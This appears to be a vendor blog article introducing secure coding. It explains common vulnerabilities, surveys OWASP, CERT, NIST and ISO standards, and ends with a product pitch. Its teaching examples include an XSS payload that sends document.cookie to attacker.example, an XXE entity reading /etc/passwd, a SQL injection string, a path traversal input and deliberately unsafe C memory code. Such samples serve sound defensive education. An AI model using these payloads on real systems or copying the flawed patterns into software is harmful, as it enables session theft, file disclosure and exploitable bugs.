Wiz Experts Team
What is secure coding?
Secure coding is the practice of developing software that is resistant to security vulnerabilities by applying security best practices, techniques, and tools early in development. Instead of thinking only about user experience, secure coding aligns every feature with security measures—right from the beginning of the software development lifecycle.
For example, an application that accepts all data from a client without sanitizing it might be easier to implement, use, and maintain. However, it opens an entry point for attackers to inject malicious code.
Let’s look at common security vulnerabilities software developers and security researchers have identified. We’ll go from low-level issues like memory vulnerabilities to higher-level problems like injection attacks.
Buffer overflow

Buffer overflows can crash your application or allow attackers to overwrite data in adjacent memory.
System programming languages like C and C++ are prone to this vulnerability: they allow, and even require, explicit memory management, but they don't check memory accesses at runtime. If you write more data into a buffer than you allocated for it, C simply overwrites whatever data follows the buffer in memory.
Example of a buffer overflow in C:
int b[5];   // buffer only goes from index 0 to 4
b[5] = 999; // out-of-bounds write: overwrites whatever follows the buffer
Use after free
Use after free happens when you free memory on the heap but keep using the old pointer.
Again, this vulnerability is prominent in languages without garbage collection, like C/C++, where you must manually manage memory. There are two types of memory: the stack and the heap. The language automatically manages the stack, which can't hold data with dynamic sizes unknown at compile time. The heap is for dynamic data, but you must manually allocate and free space on it. Freeing tells the operating system that you no longer need the memory, so any later access through the old pointer illegally touches memory your program no longer owns.
Example of use after free in C:
char* p = (char*)malloc(16);
strcpy(p, "Some text!");
free(p);
printf("%s", p); // use after free: prints what's now in the freed memory
Double free

In the case of double free, you are freeing heap memory after you have already freed it.
Double free is an issue in languages with manual memory management, where you must explicitly tell the operating system that you no longer need a specific memory range. Doing so twice results in a crash or corruption similar to the use-after-free issue. This often happens when multiple objects hold pointers to each other and each gets freed at some point. Freeing the same pointer twice can corrupt the allocator's internal bookkeeping for that memory.
Example of double free in C:
char* p = (char*)malloc(16);
strcpy(p, "Some text!");
free(p);
free(p); // double free: corrupts the allocator's bookkeeping for this memory
Insecure deserialization

Insecure deserialization involves directly transforming an external data structure (e.g., JSON, XML, etc.) to an internal one (e.g., objects, arrays, etc.) without sufficient checks.
Insecure deserialization is a common vulnerability in all kinds of applications. Accepting unsanitized data may be convenient during development, but if the same code runs in production, users can sneak in malicious data without notice.
Example of insecure deserialization in JSON:
{
  "isAdmin": true // should be deleted on the server
}
Memory leaks

Memory leaks let your application consume memory without bounds. If you exhaust the available memory and request more, your application will crash.
Every sufficiently complex application is susceptible to this vulnerability. Even garbage-collected languages aren’t safe from memory leaks. Garbage-collected languages still allow you to build data structures a garbage collector can’t manage.
Injection flaws

Executing user input as code without validating it is known as an injection flaw.
This issue can affect all applications, regardless of the programming language used. One way to make your application vulnerable to injection flaws is to offer user-supplied custom code as a feature without properly sandboxing its execution. Buffer overflows that let attackers write code into executable memory locations are another way your application can become vulnerable.
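A common instance is SQL injection. The following Python sketch contrasts a vulnerable string-concatenated query with a parameterized one (the table and inputs are illustrative):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.executemany("INSERT INTO users VALUES (?)", [("alice",), ("bob",)])

user_input = "alice' OR '1'='1"

# Vulnerable: user input is concatenated directly into the SQL string,
# so the injected OR clause matches every row in the table.
vulnerable = conn.execute(
    "SELECT name FROM users WHERE name = '" + user_input + "'"
).fetchall()
print(len(vulnerable))  # 2 — the injection matched every user

# Safe: a parameterized query treats the whole input as data, not SQL.
safe = conn.execute(
    "SELECT name FROM users WHERE name = ?", (user_input,)
).fetchall()
print(len(safe))  # 0 — no user is literally named "alice' OR '1'='1"
```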
Cross-site scripting (XSS)
Cross-site scripting is an injection flaw in which attacker-supplied HTML or JavaScript gets rendered, and executed, in another user's browser. Example of an XSS payload (the attacker URL is illustrative):

<!-- this will send a fetch request
when the mouse is over the <p> element -->
<p onmouseover="fetch('https://attacker.example/?' + document.cookie)">Some text</p>
XML external entities (XXE)
XML external entities are another instance of an injection flaw. All applications that use XML are susceptible to this attack. The idea behind external entities in XML is to allow reuse of existing XML files. However, an attacker can use this feature to include links to private XML files, allowing them to read private data indirectly through their uploaded XML file.
Example external XML entity injection:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE a [
  <!ELEMENT a ANY >
  <!-- this defines a new entity called xxe
       from a private file -->
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<!-- here the entity is rendered to display
     the file content -->
<a>&xxe;</a>
Insecure direct object reference (IDOR)
When public APIs reference objects directly by sequential IDs, IDOR lets attackers guess the IDs of all objects on the server.
This issue can happen anywhere sequential IDs are used to reference objects and is especially serious when using the IDs to reference public and private objects without requiring authorization.
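A minimal Python sketch of the missing authorization check that makes IDOR exploitable; the in-memory store, user names, and function names here are illustrative assumptions:

```python
# A tiny in-memory object store keyed by sequential IDs.
DOCUMENTS = {
    1: {"owner": "alice", "body": "alice's private notes"},
    2: {"owner": "bob", "body": "bob's private notes"},
}

def get_document(doc_id, requesting_user):
    doc = DOCUMENTS.get(doc_id)
    if doc is None:
        return None
    # The crucial step: authorize every lookup instead of trusting
    # that a caller who knows the ID is allowed to read the object.
    if doc["owner"] != requesting_user:
        raise PermissionError("not authorized for document %d" % doc_id)
    return doc["body"]

print(get_document(1, "alice"))   # alice owns document 1
try:
    get_document(2, "alice")      # alice merely guessed bob's sequential ID
except PermissionError as e:
    print("blocked:", e)
```

Random identifiers (e.g., UUIDs) additionally make enumeration impractical, but the authorization check is the real fix.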
Directory traversal (aka path traversal)
Directory traversal is another injection flaw: attackers navigate a server's directory structure via file-name inputs.
All applications that allow file name inputs can become a victim of this vulnerability. Directory traversal can happen when users upload multiple files referencing each other via relative paths. Attackers can use file traversal paths like ".." to navigate from their upload directory on the server and into directories with files from admins or other users.
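One common defense is to resolve each user-supplied path and verify it still lies inside the intended root directory. A Python sketch (the upload directory and helper name are illustrative):

```python
import os

UPLOAD_ROOT = "/srv/uploads"  # hypothetical upload directory

def safe_join(root, user_path):
    # Resolve the requested path, then verify it still lies inside the
    # root; ".." segments that escape the upload directory are rejected.
    candidate = os.path.normpath(os.path.join(root, user_path))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path traversal attempt: " + user_path)
    return candidate

print(safe_join(UPLOAD_ROOT, "report.txt"))     # /srv/uploads/report.txt
try:
    safe_join(UPLOAD_ROOT, "../../etc/passwd")  # ".." escapes the root
except ValueError as e:
    print("blocked:", e)
```

On systems with symbolic links, resolving with `os.path.realpath` before the containment check closes a further loophole.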
Secure coding standards

Secure coding standards are sets of guidelines and best practices that developers follow to create secure software and minimize vulnerabilities. They address common coding mistakes and weaknesses that attackers can exploit, aiming to produce more resilient code.
Below are the common secure code standards to follow:
OWASP Secure Coding Practices (SCP) is a comprehensive set of guidelines and recommendations for developing secure software applications. It's created and maintained by the Open Web Application Security Project (OWASP), a non-profit organization dedicated to improving software security. Here are some of its key focuses:
Input validation and sanitization: Scrutinizing all user input to prevent injection attacks like SQL injection and cross-site scripting (XSS).
Authentication and authorization: Enforcing robust authentication mechanisms and restricting access to authorized users and actions.
Session management: Securing session IDs to thwart session hijacking.
Encryption: Safeguarding sensitive data using encryption at rest and in transit.
Error handling and logging: Implementing proper error handling to avoid disclosing sensitive information and logging events for security auditing.
CERT Secure Coding Standards (SCS) are a set of guidelines and recommendations developed by the Software Engineering Institute (SEI) at Carnegie Mellon University to help developers write secure code and prevent vulnerabilities. Key areas of focus:
Language-specific guidelines: Offering recommendations for C, C++, Java, Android, and Perl to address common vulnerabilities in those languages.
Defensive programming: Emphasizing anticipating and handling errors gracefully to prevent exploitation.
Memory management: Focus on preventing buffer overflows and memory leaks, especially in languages like C and C++.
The NIST Secure Software Development Framework (SSDF), published as NIST Special Publication 800-218, is a set of recommendations developed by the National Institute of Standards and Technology (NIST) to help developers write secure code and mitigate vulnerabilities. Key areas of focus:
Input validation and sanitization: Preventing injection attacks like SQL injection and cross-site scripting (XSS) by ensuring user-provided data is safe.
Authentication and authorization: Enforcing robust authentication mechanisms and secure session management.
Encryption: Using encryption techniques to protect sensitive data at rest and in transit.
Error handling and logging: Implementing proper error handling to avoid disclosing sensitive information and logging security-related events.
Memory management: Preventing memory-related vulnerabilities like buffer overflows and memory leaks, especially in languages like C and C++.
ISO/IEC 27001 is an international information security standard. While it's not specifically a secure coding standard, it does include requirements for secure coding practices as part of a comprehensive security management approach. Annex A, Control 8.28: Secure Coding Practices, specifically focuses on secure coding and requires organizations to:
Develop secure coding processes for in-house development and third-party code.
Stay informed about evolving threats and vulnerabilities.
Implement robust secure coding principles to address them.
Now that we’ve looked into the common issues, let's explore potential solutions. (For a more thorough resource on the topic, check out the OWASP secure coding practices in the OWASP Developer Guide. It’s still a draft, but it features invaluable security tips.) Here are the top three tips for secure coding:
1. Use modern languages and tools
Many memory-related security vulnerabilities affect programming languages with manual memory management and no built-in memory checks. When starting a new project, make sure you really require C/C++ for it, and if you do, use smart pointers and static code analyzers to minimize the impact of language flaws.
If you need system programming features, a more modern language like Rust can be a good choice because its type system checks memory use at compile time. Zig might also be a good alternative, as it has no hidden control flow or memory allocations.
If you don’t need system programming features, using a garbage-collected language like Java or C# can protect you from many memory issues.
2. Validate and sanitize input and output data
Keeping input data clean isn’t always possible; validation libraries have bugs, too. To ensure nothing malicious leaks through to your users, display outputs derived from user inputs only in a safe way (e.g., escape user-supplied content instead of rendering it as HTML).
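Output escaping can be sketched in a few lines of Python using the standard library's `html.escape` (the payload string is illustrative):

```python
import html

user_input = '<img src=x onerror="fetch(\'//attacker.example\')">'

# Escaping on output neutralizes the payload even when validation missed
# it: the browser renders the markup as inert text instead of executing it.
safe_output = html.escape(user_input)
print(safe_output)
# &lt;img src=x onerror=&quot;fetch(&#x27;//attacker.example&#x27;)&quot;&gt;
```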
3. Check third-party code integrity
You should treat third-party code like libraries and frameworks as inputs, too: not inputs to your application but inputs to your build process, since your application essentially consists of your own code plus third-party code. Always pin a specific version or hash when using libraries in production deployments. That way, no new version can sneak into your deployments unchecked.
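As a hypothetical example with pip, version and hash pinning in a requirements file can look like this (the package is illustrative and the digest is a placeholder, not a real hash):

```
# requirements.txt — pin the exact version and the artifact hash;
# `pip install --require-hashes` refuses anything that doesn't match.
requests==2.31.0 \
    --hash=sha256:<hex digest of the released artifact>
```

Most ecosystems have an equivalent mechanism, such as lockfiles with integrity checksums.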
Secure coding is a practice that touches all aspects of software development—from choice of data formats and programming languages to planning of inputs and outputs to implementation.
To mitigate risks, make sure that only the data you expect gets into your system. Looking out for new tools and programming languages that improve your code security posture is a good idea, as well. Wiz supplies you with the tools needed to secure code from IDE to deployment, offering industry-leading code and policy scanners and end-to-end traceability for fast remediation. Specifically Wiz for Code Security offers:
Code Scanning: Wiz integrates with code repositories like GitHub to proactively scan for vulnerabilities, misconfigurations, secrets, and compliance issues early in the development process. This helps catch potential problems before they reach production.
Cloud to Code: Wiz can trace risks discovered in production environments back to the specific code and teams that introduced them. This enables rapid identification of the root cause and facilitates swift remediation.
In-Code Remediation Guidance: Wiz provides developers with in-code remediation guidance, offering specific recommendations on how to fix issues right within their development environment. This speeds up the resolution process and empowers developers to take ownership of security.
Secure your SDLC from start to finish
See why Wiz is one of the few cloud security platforms that security and devops teams both love to use.